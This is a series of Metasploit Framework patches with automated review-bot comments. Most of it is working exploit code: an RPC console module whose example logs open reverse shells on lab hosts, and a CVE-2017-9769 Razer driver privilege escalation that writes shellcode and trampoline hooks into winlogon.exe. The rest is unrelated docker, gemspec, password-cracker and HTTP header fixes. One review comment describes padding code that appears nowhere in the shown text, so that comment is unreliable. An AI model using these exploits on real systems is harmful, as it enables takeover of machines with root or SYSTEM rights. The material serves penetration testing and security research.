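Review bot: The new `"\x00"*163` padding is hard-wired for a one-character filename plus `.exe`, as the trailing comment admits, so if the interpolated filename is ever longer the fixed-width field in this packet shifts and the record is malformed without any error. Derive the pad from the actual string length instead of a literal, for example `pkt << "\x00" * (field_width - name.length)` where `field_width` is the total width of the path field (163 plus the five-byte name in this layout) and `name` is the filename variable interpolated on the line above, and spell the comment `character`. Where that filename is generated is outside this hunk, so the exact variable could not be confirmed.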
@@ -0,0 +1,142 @@ +## Description + + This module connects to a specified Metasploit RPC server and uses the *console.write* procedure to execute operating system commands. Valid credentials are required to access the RPC interface. + + +## Vulnerable Application + + [Metasploit](https://www.rapid7.com/products/metasploit/) is the world's most used penetration testing software. The RPC API can be used to programmatically drive the Metasploit Framework and Metasploit Pro products. + + To start the RPC service, run `msfrpcd -U msf -P abc123`; or run `load msgrpc ServerHost=0.0.0.0 ServerPort=55552 User=msf Pass=abc123 SSL=Y` from within msfconsole. + + This module has been tested successfully on: + + * Metasploit 4.15 on Kali 1.0.6 + * Metasploit 4.14 on Kali 2017.1 + * Metasploit 4.14 on Windows 7 SP1 + + Source and Installers: + + * [Source Code Repository](https://github.com/rapid7/metasploit-framework) + * [Installers](https://github.com/rapid7/metasploit-framework/wiki/Downloads-by-Version) + +## Verification Steps + + 1. Start `msfconsole` + 2. Do: `use exploit/multi/misc/msf_rpc_console` + 3. Do: `set RHOST [IP]` + 4. Do: `set RPORT [PORT]` (default: `55552`) + 5. Do: `set USERNAME [USERNAME]` (default: `msf`) + 6. Do: `set PASSWORD [PASSWORD]` + 7. Do: `set LHOST [IP]` + 8. Do: `run` + 9. You should get a session + + +## Options + + **Username** + + The username for Metasploit RPC (default: `msf`). + + **Password** + + The password for the RPC user. 
+ + +## Scenarios + +### Ruby Target + + ``` + msf > use exploit/multi/misc/msf_rpc_console + msf exploit(msf_rpc_console) > set rhost 172.16.191.166 + rhost => 172.16.191.166 + msf exploit(msf_rpc_console) > set username msf + username => msf + msf exploit(msf_rpc_console) > set password abc123 + password => abc123 + msf exploit(msf_rpc_console) > set lhost 172.16.191.181 + lhost => 172.16.191.181 + msf exploit(msf_rpc_console) > set target 0 + target => 0 + msf exploit(msf_rpc_console) > run + + [*] Started reverse TCP handler on 172.16.191.181:4444 + [+] 172.16.191.166:55552 - Authenticated successfully + [*] 172.16.191.166:55552 - Metasploit 4.14.28-dev + [*] 172.16.191.166:55552 - Ruby 2.3.3 x64-mingw32 2016-11-21 + [*] 172.16.191.166:55552 - API version 1.0 + [+] 172.16.191.166:55552 - Created console #0 + [*] 172.16.191.166:55552 - Sending payload... + [*] Command shell session 1 opened (172.16.191.181:4444 -> 172.16.191.166:52984) at 2017-07-05 03:40:50 -0400 + + whoami + win-sgbsd5tqutq\user + ``` + +### Windows CMD Target + + ``` + msf > use exploit/multi/misc/msf_rpc_console + msf exploit(msf_rpc_console) > set rhost 172.16.191.166 + rhost => 172.16.191.166 + msf exploit(msf_rpc_console) > set username msf + username => msf + msf exploit(msf_rpc_console) > set password abc123 + password => abc123 + msf exploit(msf_rpc_console) > set lhost 172.16.191.181 + lhost => 172.16.191.181 + msf exploit(msf_rpc_console) > set target 0 + target => 1 + msf exploit(msf_rpc_console) > set payload cmd/windows/powershell_reverse_tcp + payload => cmd/windows/powershell_reverse_tcp + msf exploit(msf_rpc_console) > run + + [*] Started reverse SSL handler on 172.16.191.181:4444 + [+] 172.16.191.166:55552 - Authenticated successfully + [*] 172.16.191.166:55552 - Metasploit 4.14.28-dev + [*] 172.16.191.166:55552 - Ruby 2.3.3 x64-mingw32 2016-11-21 + [*] 172.16.191.166:55552 - API version 1.0 + [+] 172.16.191.166:55552 - Created console #1 + [*] 172.16.191.166:55552 - Sending 
payload... + [*] Powershell session session 2 opened (172.16.191.181:4444 -> 172.16.191.166:52996) at 2017-07-05 03:44:05 -0400 + + Windows PowerShell running as user user on WIN-SGBSD5TQUTQ + Copyright (C) 2015 Microsoft Corporation. All rights reserved. + + PS C:\metasploit>whoami + win-sgbsd5tqutq\user + ``` + +### Unix CMD Target + + ``` + msf > use exploit/multi/misc/msf_rpc_console + msf exploit(msf_rpc_console) > set rhost 172.16.191.215 + rhost => 172.16.191.215 + msf exploit(msf_rpc_console) > set username msf + username => msf + msf exploit(msf_rpc_console) > set password abc123 + password => abc123 + msf exploit(msf_rpc_console) > set lhost 172.16.191.181 + lhost => 172.16.191.181 + msf exploit(msf_rpc_console) > set target 2 + target => 2 + msf exploit(msf_rpc_console) > set payload cmd/unix/reverse_python + payload => cmd/unix/reverse_python + msf exploit(msf_rpc_console) > run + + [*] Started reverse TCP handler on 172.16.191.181:4444 + [+] 172.16.191.215:55552 - Authenticated successfully + [*] 172.16.191.215:55552 - Metasploit 4.15.0-dev-aceeedc + [*] 172.16.191.215:55552 - Ruby 2.3.0 x86_64-linux 2015-12-25 + [*] 172.16.191.215:55552 - API version 1.0 + [+] 172.16.191.215:55552 - Created console #0 + [*] 172.16.191.215:55552 - Sending payload... + [*] Command shell session 3 opened (172.16.191.181:4444 -> 172.16.191.215:40768) at 2017-07-05 03:46:11 -0400 + + id + uid=0(root) gid=0(root) groups=0(root) + ``` + diff --git a/modules/exploits/multi/misc/msf_rpc_console.rb b/modules/exploits/multi/misc/msf_rpc_console.rb new file mode 100644 index 0000000000..806e5e0c54 --- /dev/null +++ b/modules/exploits/multi/misc/msf_rpc_console.rb 
@@ -0,0 +1,152 @@ +## +# This module requires Metasploit: http://metasploit.com/download +# Current source: https://github.com/rapid7/metasploit-framework +## + +require 'msf/core/rpc/v10/client' + +class MetasploitModule < Msf::Exploit::Remote + Rank = ExcellentRanking + + include Msf::Exploit::Remote::Tcp + + def initialize(info = {}) + super(update_info(info, + 'Name' => 'Metasploit RPC Console Command Execution', + 'Description' => %q{ + This module connects to a specified Metasploit RPC server and + uses the 'console.write' procedure to execute operating + system commands. Valid credentials are required to access the + RPC interface. + + This module has been tested successfully on Metasploit 4.15 + on Kali 1.0.6; Metasploit 4.14 on Kali 2017.1; and Metasploit + 4.14 on Windows 7 SP1. + }, + 'License' => MSF_LICENSE, + 'Author' => 'Brendan Coles ', + 'References' => + [ + [ 'URL', 'https://help.rapid7.com/metasploit/Content/api/rpc/overview.html' ], + [ 'URL', 'https://community.rapid7.com/docs/DOC-1516' ] + ], + 'Platform' => %w{ ruby unix win }, + 'Targets' => [ + [ 'Ruby', { 'Arch' => ARCH_RUBY, + 'Platform' => 'ruby', + 'Payload' => { 'BadChars' => "\x00" } } ], + [ 'Windows CMD', { 'Arch' => ARCH_CMD, + 'Platform' => 'win', + 'Payload' => { 'BadChars' => "\x00\x0A\x0D" } } ], + [ 'Unix CMD', { 'Arch' => ARCH_CMD, + 'Platform' => 'unix', + 'Payload' => { 'BadChars' => "\x00\x0A\x0D" } } ] + ], + 'DefaultOptions' => { 'PrependFork' => true, 'WfsDelay' => 15 }, + 'Privileged' => false, + 'DisclosureDate' => 'May 22 2011', + 'DefaultTarget' => 0)) + register_options [ Opt::RPORT(55552), + OptString.new('USERNAME', [true, 'Username for Metasploit RPC', 'msf']), + OptString.new('PASSWORD', [true, 'Password for the specified username', '']), + OptBool.new('SSL', [ true, 'Use SSL', true]) ] + end + + def execute_command(cmd, opts = {}) + res = @rpc.call 'console.write', @console_id, "\r\n#{cmd}\r\n" + + if res.nil? 
+ fail_with Failure::Unknown, 'Connection failed' + end + + unless res['wrote'].to_s =~ /\A\d+\z/ + print_error "Could not write to console #{@console_id}:" + print_line res.to_s + return + end + + vprint_good "Wrote #{res['wrote']} bytes to console" + end + + def exploit + begin + @rpc = Msf::RPC::Client.new :host => rhost, :port => rport, :ssl => ssl + rescue Rex::ConnectionRefused => e + fail_with Failure::Unreachable, 'Connection refused' + rescue => e + fail_with Failure::Unknown, "Connection failed: #{e}" + end + + res = @rpc.login datastore['USERNAME'], datastore['PASSWORD'] + + if @rpc.token.nil? + fail_with Failure::NoAccess, 'Authentication failed' + end + + print_good 'Authenticated successfully' + vprint_status "Received temporary token: #{@rpc.token}" + + version = @rpc.call 'core.version' + + if res.nil? + fail_with Failure::Unknown, 'Connection failed' + end + + print_status "Metasploit #{version['version']}" + print_status "Ruby #{version['ruby']}" + print_status "API version #{version['api']}" + + vprint_status 'Creating new console...' + res = @rpc.call 'console.create' + + if res.nil? + fail_with Failure::Unknown, 'Connection failed' + end + + unless res['id'].to_s =~ /\A\d+\z/ + print_error 'Could not create console:' + print_line res.to_s + return + end + + @console_id = res['id'] + print_good "Created console ##{@console_id}" + + print_status 'Sending payload...' + + case target['Platform'] + when 'ruby' + cmd = "ruby -e 'eval(%[#{Rex::Text.encode_base64(payload.encoded)}].unpack(%[m0]).first)'" + when 'win' + cmd = payload.encoded + when 'unix' + cmd = payload.encoded + else + fail_with Failure::NoTarget, 'Invalid target' + end + + execute_command cmd + end + + def cleanup + return if @console_id.nil? + + vprint_status 'Removing console...' + res = @rpc.call 'console.destroy', @console_id + + if res.nil? + print_error 'Connection failed' + return + end + + unless res['result'].eql? 
'success' + print_warning "Could not destroy console ##{@console_id}:" + print_line res.to_s + return + end + + vprint_good "Destroyed console ##{@console_id}" + ensure + @rpc.close + end +end From d24e2943ca7189517f02319612336257d221e3d0 Mon Sep 17 00:00:00 2001 From: Christian Mehlmauer Date: Mon, 10 Jul 2017 16:38:10 +0200 Subject: [PATCH 19/63] update docker stuff --- docker/bin/msfvenom | 4 ++++ docker/bin/msfvenom-dev | 26 ++++++++++++++++++++++++++ metasploit-framework.gemspec | 4 +++- 3 files changed, 33 insertions(+), 1 deletion(-) create mode 100755 docker/bin/msfvenom-dev diff --git a/docker/bin/msfvenom b/docker/bin/msfvenom index 2b12210b4f..3efc05168d 100755 --- a/docker/bin/msfvenom +++ b/docker/bin/msfvenom @@ -17,5 +17,9 @@ if [[ -z "$MSF_PATH" ]]; then MSF_PATH=$(dirname $(dirname $path)) fi +if [[ -n "$MSF_BUILD" ]]; then + docker-compose -f $MSF_PATH/docker-compose.yml build +fi + cd $MSF_PATH docker-compose run --rm --service-ports ms ./msfvenom "$@" diff --git a/docker/bin/msfvenom-dev b/docker/bin/msfvenom-dev new file mode 100755 index 0000000000..32b1049748 --- /dev/null +++ b/docker/bin/msfvenom-dev @@ -0,0 +1,26 @@ +#! /bin/bash + +if [[ -z "$MSF_PATH" ]]; then + path=`dirname $0` + + # check for ./docker/msfconsole.rc + if [[ ! -f $path/../msfconsole.rc ]] ; then + + # we are not inside the project + realpath --version > /dev/null 2>&1 || { echo >&2 "I couldn't find where metasploit is. Set \$MSF_PATH or execute this from the project root"; exit 1 ;} + + # determine script path + pushd $(dirname $(realpath $0)) > /dev/null + path=$(pwd) + popd > /dev/null + fi + MSF_PATH=$(dirname $(dirname $path)) +fi + +cd $MSF_PATH + +if [[ -n "$MSF_BUILD" ]]; then + docker-compose -f $MSF_PATH/docker-compose.yml -f $MSF_PATH/docker/docker-compose.development.override.yml build +fi + +docker-compose -f $MSF_PATH/docker-compose.yml -f $MSF_PATH/docker/docker-compose.development.override.yml run --rm --service-ports ms ./msfvenom "$@" 
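Review bot: In `exploit`, the nil check after `version = @rpc.call 'core.version'` tests `res` (the login result) instead of `version`, so a failed `core.version` call reaches `version['version']` and raises NoMethodError on nil rather than the intended `fail_with`; change it to `if version.nil?`. `cleanup`'s `ensure @rpc.close` also runs when `Msf::RPC::Client.new` raised and `@rpc` was never assigned, turning the original connection error into a NoMethodError; use `@rpc.close if @rpc`. `vprint_status "Received temporary token: #{@rpc.token}"` writes the live RPC auth token to the console log in verbose mode, which is worth a comment or trimming to its first few characters.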
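Review bot: `$MSF_PATH` is unquoted in the new `docker-compose -f $MSF_PATH/docker-compose.yml build` line, so a checkout path containing spaces splits into several arguments and the build is run against the wrong file; quote it as `docker-compose -f "$MSF_PATH/docker-compose.yml" build`. The same applies to the existing `cd $MSF_PATH` immediately below, which also has no failure check.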
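Review bot: `cd $MSF_PATH` has no failure check and `$MSF_PATH` is unquoted throughout the new script, so a wrong or space-containing path either keeps running in the caller's directory or splits into several `-f` arguments before docker-compose starts; use `cd "$MSF_PATH" || exit 1` and quote both compose-file paths. The script otherwise mirrors `docker/bin/msfvenom` line for line apart from the override file, so a shared helper taking the compose files as arguments would stop the two from drifting. `$path` from `dirname $0` is likewise unquoted in the `pushd`/`dirname` chain copied from the sibling script.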
diff --git a/metasploit-framework.gemspec b/metasploit-framework.gemspec index dd46fa433e..cb1e8596af 100644 --- a/metasploit-framework.gemspec +++ b/metasploit-framework.gemspec @@ -24,7 +24,9 @@ Gem::Specification.new do |spec| spec.homepage = 'https://www.metasploit.com' spec.license = 'BSD-3-clause' - if File.directory?(File.join(File.dirname(__FILE__), ".git")) + # only do a git ls-files if the .git folder exists and we have a git binary in PATH + if File.directory?(File.join(File.dirname(__FILE__), ".git")) && + ENV['PATH'].split(':').collect {|d| Dir.entries d if Dir.exists? d}.flatten.include?("git") spec.files = `git ls-files`.split($/).reject { |file| file =~ /^documentation|^external/ } From fe360e3e2acc81e1f9bcc6a50a1e2c9ee77a093d Mon Sep 17 00:00:00 2001 From: wchen-r7 Date: Mon, 10 Jul 2017 11:18:20 -0500 Subject: [PATCH 20/63] Fix #8685, Check nil condition for #wordlist_file in jtr modules JTR modules should never assume there is always a database connected while using #wordlist_file, considering a database is an optional component for Framework. Fix #8685 --- modules/auxiliary/analyze/jtr_aix.rb | 5 +++++ modules/auxiliary/analyze/jtr_crack_fast.rb | 5 +++++ modules/auxiliary/analyze/jtr_linux.rb | 5 +++++ modules/auxiliary/analyze/jtr_mssql_fast.rb | 5 +++++ modules/auxiliary/analyze/jtr_mysql_fast.rb | 5 +++++ modules/auxiliary/analyze/jtr_postgres_fast.rb | 5 +++++ 6 files changed, 30 insertions(+) diff --git a/modules/auxiliary/analyze/jtr_aix.rb b/modules/auxiliary/analyze/jtr_aix.rb index 18b8515040..f3c42045fd 100644 --- a/modules/auxiliary/analyze/jtr_aix.rb +++ b/modules/auxiliary/analyze/jtr_aix.rb 
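Review bot: The PATH scan splits on `':'` and looks for an entry named exactly `git`, which is wrong on Windows where the separator is `;` and the binary is `git.exe`, so the `git ls-files` branch is skipped there even with git installed. `ENV['PATH'].split(File::PATH_SEPARATOR)` together with checking for `git` and `git.exe` (or appending `RbConfig::CONFIG['EXEEXT']`) fixes both, and `File.executable?(File.join(d, name))` avoids listing every directory on PATH via `Dir.entries`. The conditional's `else` branch is outside the hunk.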
@@ -32,6 +32,11 @@ class MetasploitModule < Msf::Auxiliary # generate our wordlist and close the file handle wordlist = wordlist_file + unless wordlist + print_error('This module cannot run without a database connected. Use db_connect to connect to a database.') + return + end + wordlist.close print_status "Wordlist file written out to #{wordlist.path}" cracker.wordlist = wordlist.path diff --git a/modules/auxiliary/analyze/jtr_crack_fast.rb b/modules/auxiliary/analyze/jtr_crack_fast.rb index b3ab197ca6..96f57bef69 100644 --- a/modules/auxiliary/analyze/jtr_crack_fast.rb +++ b/modules/auxiliary/analyze/jtr_crack_fast.rb @@ -31,6 +31,11 @@ class MetasploitModule < Msf::Auxiliary # generate our wordlist and close the file handle wordlist = wordlist_file + unless wordlist + print_error('This module cannot run without a database connected. Use db_connect to connect to a database.') + return + end + wordlist.close print_status "Wordlist file written out to #{wordlist.path}" cracker.wordlist = wordlist.path diff --git a/modules/auxiliary/analyze/jtr_linux.rb b/modules/auxiliary/analyze/jtr_linux.rb index a49d2f14c4..04a4cd83a0 100644 --- a/modules/auxiliary/analyze/jtr_linux.rb +++ b/modules/auxiliary/analyze/jtr_linux.rb @@ -46,6 +46,11 @@ class MetasploitModule < Msf::Auxiliary # generate our wordlist and close the file handle wordlist = wordlist_file + unless wordlist + print_error('This module cannot run without a database connected. Use db_connect to connect to a database.') + return + end + wordlist.close print_status "Wordlist file written out to #{wordlist.path}" cracker.wordlist = wordlist.path diff --git a/modules/auxiliary/analyze/jtr_mssql_fast.rb b/modules/auxiliary/analyze/jtr_mssql_fast.rb index 787f0de29a..5ab7e96c0f 100644 --- a/modules/auxiliary/analyze/jtr_mssql_fast.rb +++ b/modules/auxiliary/analyze/jtr_mssql_fast.rb 
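Review bot: The same five-line `unless wordlist` guard is pasted into six modules in this commit, so the next JTR module will forget it and the message will drift; hoisting the check into the shared `wordlist_file` helper (having it `print_error` and return nil, or raise a named error the modules rescue) keeps it in one place. The message asserts that the only reason for a nil wordlist is a missing database, but the visible code only shows `wordlist_file` returning nil; if the helper can return nil for other reasons, the text will mislead the user. The enclosing `run` method continues beyond the hunk.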
@@ -33,6 +33,11 @@ class MetasploitModule < Msf::Auxiliary # generate our wordlist and close the file handle wordlist = wordlist_file + unless wordlist + print_error('This module cannot run without a database connected. Use db_connect to connect to a database.') + return + end + wordlist.close print_status "Wordlist file written out to #{wordlist.path}" cracker.wordlist = wordlist.path diff --git a/modules/auxiliary/analyze/jtr_mysql_fast.rb b/modules/auxiliary/analyze/jtr_mysql_fast.rb index cb4e6a7a30..af8c4fe11c 100644 --- a/modules/auxiliary/analyze/jtr_mysql_fast.rb +++ b/modules/auxiliary/analyze/jtr_mysql_fast.rb @@ -32,6 +32,11 @@ class MetasploitModule < Msf::Auxiliary # generate our wordlist and close the file handle wordlist = wordlist_file + unless wordlist + print_error('This module cannot run without a database connected. Use db_connect to connect to a database.') + return + end + wordlist.close print_status "Wordlist file written out to #{wordlist.path}" cracker.wordlist = wordlist.path diff --git a/modules/auxiliary/analyze/jtr_postgres_fast.rb b/modules/auxiliary/analyze/jtr_postgres_fast.rb index 7fdab976d5..da34fdf0b6 100644 --- a/modules/auxiliary/analyze/jtr_postgres_fast.rb +++ b/modules/auxiliary/analyze/jtr_postgres_fast.rb @@ -36,6 +36,11 @@ class MetasploitModule < Msf::Auxiliary # generate our wordlist and close the file handle wordlist = wordlist_file + unless wordlist + print_error('This module cannot run without a database connected. Use db_connect to connect to a database.') + return + end + wordlist.close From 53d5060fbdd8297c5d6d1d6c7673cfc8eb026cec Mon Sep 17 00:00:00 2001 From: Spencer McIntyre Date: Mon, 10 Jul 2017 16:57:23 -0400 Subject: [PATCH 21/63] Add the LPE for CVE-2017-9769 --- .../windows/local/razer_zwopenprocess.rb | 247 ++++++++++++++++++ 1 file changed, 247 insertions(+) create mode 100644 modules/exploits/windows/local/razer_zwopenprocess.rb 
diff --git a/modules/exploits/windows/local/razer_zwopenprocess.rb b/modules/exploits/windows/local/razer_zwopenprocess.rb
new file mode 100644
index 0000000000..177a06424b
--- /dev/null
+++ b/modules/exploits/windows/local/razer_zwopenprocess.rb
@@ -0,0 +1,247 @@ +## +# This module requires Metasploit: http//metasploit.com/download +# Current source: https://github.com/rapid7/metasploit-framework +## + +require 'msf/core/exploit/local/windows_kernel' +require 'rex' +require 'metasm' + +class MetasploitModule < Msf::Exploit::Remote + Rank = NormalRanking + + include Msf::Exploit::Local::WindowsKernel + include Msf::Post::Windows::Priv + + def initialize(info = {}) + super(update_info(info, + 'Name' => 'Razer Synapse rzpnk.sys IOCTL', + 'Description' => %q{ + A vulnerability exists in the latest version of Razer Synapse + (v2.20.17.302) which can be leveraged locally by a malicious application + to elevate its privileges to those of NT_AUTHORITY\SYSTEM. The + vulnerability lies in a specific IOCTL handler in the rzpnk.sys driver + that passes a PID specified by the user to ZwOpenProcess. This can be + issued by an application to open a handle to an arbitrary process with + the necessary privileges to allocate, read and write memory in the + specified process. + + This exploit leverages this vulnerability to open a handle to the + winlogon process (which runs as NT_AUTHORITY\SYSTEM) and infect it by + installing hooks to execute attacker controlled shellcode. These hooks + are then triggered on demand by calling user32!LockWorkStation(), + resulting in the attacker's payload being executed with the privileges + of the infected winlogon process. In order for the issued IOCTL to work, + the RazerIngameEngine.exe process must not be running. This exploit will + check if it is, and attempt to kill it as necessary. + + The vulnerable software can be found here: + https://www.razerzone.com/synapse/. No Razer hardware needs to be + connected in order to leverage this vulnerability. + + This exploit is not opsec-safe due to the user being logged out as part + of the exploitation process. 
+ }, + 'Author' => 'Spencer McIntyre', + 'License' => MSF_LICENSE, + 'References' => [ + ['CVE', 'CVE-2017-9769'], + #['URL', ''], + ], + 'Platform' => 'win', + 'Targets' => + [ + # Tested on (64 bits): + # * Windows 7 SP1 + # * Windows 10.0.14385 + [ 'Windows x64', { 'Arch' => ARCH_X64 } ] + ], + 'DefaultOptions' => + { + 'EXITFUNC' => 'thread' + }, + 'DefaultTarget' => 0, + 'Privileged' => true, + 'DisclosureDate' => 'Mar 22 2017')) + end + + def check + pid = session.sys.process['RazerIngameEngine.exe'] + session.sys.process.kill(pid) unless pid.nil? + + pid = session.sys.process['winlogon.exe'] + handle = get_handle(pid) + return Exploit::CheckCode::Safe if handle.nil? + + session.railgun.kernel32.CloseHandle(handle) + Exploit::CheckCode::Vulnerable + end + + def exploit + if is_system? + fail_with(Failure::None, 'Session is already elevated') + end + + if check == Exploit::CheckCode::Safe + fail_with(Failure::NotVulnerable, 'Exploit not available on this system.') + end + + if sysinfo['Architecture'] =~ /wow64/i + fail_with(Failure::NoTarget, 'Running against WOW64 is not supported') + elsif sysinfo['Architecture'] == ARCH_X64 && target.arch.first == ARCH_X86 + fail_with(Failure::NoTarget, 'Session host is x64, but the target is specified as x86') + elsif sysinfo['Architecture'] == ARCH_X86 && target.arch.first == ARCH_X64 + fail_with(Failure::NoTarget, 'Session host is x86, but the target is specified as x64') + end + + pid = session.sys.process['RazerIngameEngine.exe'] + unless pid.nil? + # if this process is running, the IOCTL won't work but the process runs + # with user privileges so we can kill it + print_status("Found RazerIngameEngine.exe pid: #{pid}, killing it...") + session.sys.process.kill(pid) + end + + pid = session.sys.process['winlogon.exe'] + print_status("Found winlogon.exe pid: #{pid}") + + handle = get_handle(pid) + fail_with(Failure::NotVulnerable, 'Failed to open the process handle') if handle.nil? 
+ + winlogon = session.sys.process.new(pid, handle) + shellcode_address = winlogon.memory.allocate(4096) + winlogon.memory.protect(shellcode_address) + print_good("Allocated 4096 bytes in winlogon.exe at 0x#{shellcode_address.to_s(16)}") + winlogon.memory.write(shellcode_address, payload.encoded) + hook_stub_address = shellcode_address + payload.encoded.length + + result = session.railgun.kernel32.LoadLibraryA('winsta') + fail_with(Failure::Unknown, 'Failed to get a handle to winsta.dll') if result['return'] == 0 + winsta_handle = result['return'] + + # resolve and backup the functions that we'll install trampolines in + winsta_trampolines = {} # address => original chunk + winsta_functions = ['_WinStationWaitForConnect', 'WinStationIsSessionRemoteable'] + winsta_functions.each do |function| + address = get_address(winsta_handle, function) + winlogon.memory.protect(address) + winsta_trampolines[function] = { + address: address, + original: winlogon.memory.read(address, 24) + } + end + + # generate and install the hook asm + hook_stub = get_hook(shellcode_address, winsta_trampolines) + fail_with(Failure::Unknown, 'Failed to generate the hook stub') if hook_stub.nil? 
+ winlogon.memory.write(hook_stub_address, hook_stub) + vprint_status("Wrote the #{hook_stub.length} byte hook stub in winlogon.exe at 0x#{hook_stub_address}") + + # install the asm trampolines to jump to the hook + winsta_trampolines.each do |function, trampoline_info| + address = trampoline_info[:address] + trampoline = Metasm::Shellcode.assemble(Metasm::X86_64.new, %{ + mov rax, 0x#{address.to_s(16)} + push rax + mov rax, 0x#{hook_stub_address.to_s(16)} + jmp rax + }).encode_string + winlogon.memory.write(address, trampoline) + vprint_status("Installed winsta!#{address} trampoline at 0x#{address.to_s(16)}") + end + + session.railgun.user32.LockWorkStation() + session.railgun.kernel32.CloseHandle(handle) + end + + def get_address(dll_handle, function_name) + result = session.railgun.kernel32.GetProcAddress(dll_handle, function_name) + fail_with(Failure::Unknown, 'Failed to get function address') if result['return'] == 0 + result['return'] + end + + # this is where the actual vulnerability is leveraged + def get_handle(pid) + handle = open_device("\\\\.\\47CD78C9-64C3-47C2-B80F-677B887CF095", 'FILE_SHARE_WRITE|FILE_SHARE_READ', 0, 'OPEN_EXISTING') + return nil unless handle + vprint_status('Successfully opened a handle to the driver') + + buffer = [pid, 0].pack(target.arch.first == ARCH_X64 ? 
'QQ' : 'LL') + + session.railgun.add_function('ntdll', 'NtDeviceIoControlFile', 'DWORD',[ + ['DWORD', 'FileHandle', 'in' ], + ['DWORD', 'Event', 'in' ], + ['LPVOID', 'ApcRoutine', 'in' ], + ['LPVOID', 'ApcContext', 'in' ], + ['PDWORD', 'IoStatusBlock', 'out'], + ['DWORD', 'IoControlCode', 'in' ], + ['PBLOB', 'InputBuffer', 'in' ], + ['DWORD', 'InputBufferLength', 'in' ], + ['PBLOB', 'OutputBuffer', 'out'], + ['DWORD', 'OutputBufferLength', 'in' ], + ]) + result = session.railgun.ntdll.NtDeviceIoControlFile(handle, nil, nil, nil, 4, 0x22a050, buffer, buffer.length, buffer.length, buffer.length) + return nil if result['return'] != 0 + session.railgun.kernel32.CloseHandle(handle) + + result['OutputBuffer'].unpack(target.arch.first == ARCH_X64 ? 'QQ' : 'LL')[1] + end + + def get_hook(shellcode_address, restore) + dll_handle = session.railgun.kernel32.GetModuleHandleA('kernel32')['return'] + return nil if dll_handle == 0 + create_thread_address = get_address(dll_handle, 'CreateThread') + + stub = %{ + call main + ; restore the functions where the trampolines were installed + push rbx + } + + restore.each do |function, trampoline_info| + original = trampoline_info[:original].unpack('Q*') + stub << "mov rax, 0x#{trampoline_info[:address].to_s(16)}" + original.each do |chunk| + stub << %{ + mov rbx, 0x#{chunk.to_s(16)} + mov qword ptr ds:[rax], rbx + add rax, 8 + } + end + end + + stub << %{ + pop rbx + ret + + main: + ; backup registers we're going to mangle + push r9 + push r8 + push rdx + push rcx + + ; setup the arguments for the call to CreateThread + xor rax, rax + push rax ; lpThreadId + push rax ; dwCreationFlags + xor r9, r9 ; lpParameter + mov r8, 0x#{shellcode_address.to_s(16)} ; lpStartAddress + xor rdx, rdx ; dwStackSize + xor rcx, rcx ; lpThreadAttributes + mov rax, 0x#{create_thread_address.to_s(16)} ; &CreateThread + + call rax + add rsp, 16 + + ; restore arguments that were mangled + pop rcx + pop rdx + pop r8 + pop r9 + ret + } + print_line(stub) + 
Metasm::Shellcode.assemble(Metasm::X86_64.new, stub).encode_string + end +end From 50b1ec4044a652e21a81e843189ddc364e8a7115 Mon Sep 17 00:00:00 2001 From: wchen-r7 Date: Mon, 10 Jul 2017 16:05:09 -0500 Subject: [PATCH 22/63] Fix #8675, Add Cache-Control header, also meta tag for BAP2 Hopefully that browsers will respect this. Fix #8675 --- lib/msf/core/exploit/browser_autopwn2.rb | 1 + lib/msf/core/exploit/http/server.rb | 5 +++++ modules/auxiliary/gather/browser_info.rb | 2 +- 3 files changed, 7 insertions(+), 1 deletion(-) diff --git a/lib/msf/core/exploit/browser_autopwn2.rb b/lib/msf/core/exploit/browser_autopwn2.rb index 7270a03639..b5a0bdc4a4 100644 --- a/lib/msf/core/exploit/browser_autopwn2.rb +++ b/lib/msf/core/exploit/browser_autopwn2.rb @@ -810,6 +810,7 @@ module Msf %Q| + diff --git a/lib/msf/core/exploit/http/server.rb b/lib/msf/core/exploit/http/server.rb index 14d77f7601..ba95ccd85a 100644 --- a/lib/msf/core/exploit/http/server.rb +++ b/lib/msf/core/exploit/http/server.rb @@ -32,6 +32,7 @@ module Exploit::Remote::HttpServer register_evasion_options( [ + OptBool.new('HTTP::no_cache', [false, 'Disallow the browser to cache HTTP content', false]), OptBool.new('HTTP::chunked', [false, 'Enable chunking of HTTP responses via "Transfer-Encoding: chunked"', false]), OptBool.new('HTTP::header_folding', [false, 'Enable folding of HTTP headers', false]), OptBool.new('HTTP::junk_headers', [false, 'Enable insertion of random junk HTTP headers', false]), @@ -558,6 +559,10 @@ module Exploit::Remote::HttpServer response.headers.junk_headers = 1 end + if datastore['HTTP::no_cache'] + response.headers['Cache-Control'] = 'no-store, no-cache, must-revalidate' + end + headers.each_pair { |k,v| response[k] = v } cli.send_response(response) diff --git a/modules/auxiliary/gather/browser_info.rb b/modules/auxiliary/gather/browser_info.rb index 35dbb77416..0f386db4f8 100644 --- a/modules/auxiliary/gather/browser_info.rb +++ b/modules/auxiliary/gather/browser_info.rb 
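Review bot: `check` is not side-effect free: it kills `RazerIngameEngine.exe` before probing, and `exploit` then calls `check` and kills the same process a second time; a check method should only observe, so the kill belongs only in `exploit` (which already has it) and `check` should just report whether the handle can be opened. In `get_handle`, the `return nil if result['return'] != 0` path exits before `session.railgun.kernel32.CloseHandle(handle)`, leaking the device handle on the failure path; close it before returning. `print_line(stub)` at the end of `get_hook` dumps the whole assembly listing on every run and reads as leftover debugging, so it should be `vprint_line(stub)` or removed. Two log messages are also off: `"... at 0x#{hook_stub_address}"` prints the address in decimal behind a 0x prefix (missing `.to_s(16)`), and `"Installed winsta!#{address} trampoline at ..."` interpolates the address where the loop's `function` name was meant. The placeholder `#['URL', '']` reference should be dropped or filled in.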
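Review bot: The `Cache-Control` header set under `datastore['HTTP::no_cache']` only speaks to HTTP/1.1 caches; older browsers and intermediaries that follow HTTP/1.0 semantics honour `Pragma` and `Expires`, so pairing the new line with `response.headers['Pragma'] = 'no-cache'` and `response.headers['Expires'] = '0'` makes the option deliver what its description promises more reliably. Because the assignment happens before the `headers.each_pair { |k,v| response[k] = v }` loop, a caller-supplied `Cache-Control` appears to override it, which seems intended but deserves a comment such as `# explicit caller headers below take precedence`. Registering a caching control under `register_evasion_options` also reads oddly since it is a delivery fix rather than an evasion, though that may follow an existing convention in this file. The enclosing method starts outside the hunk.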
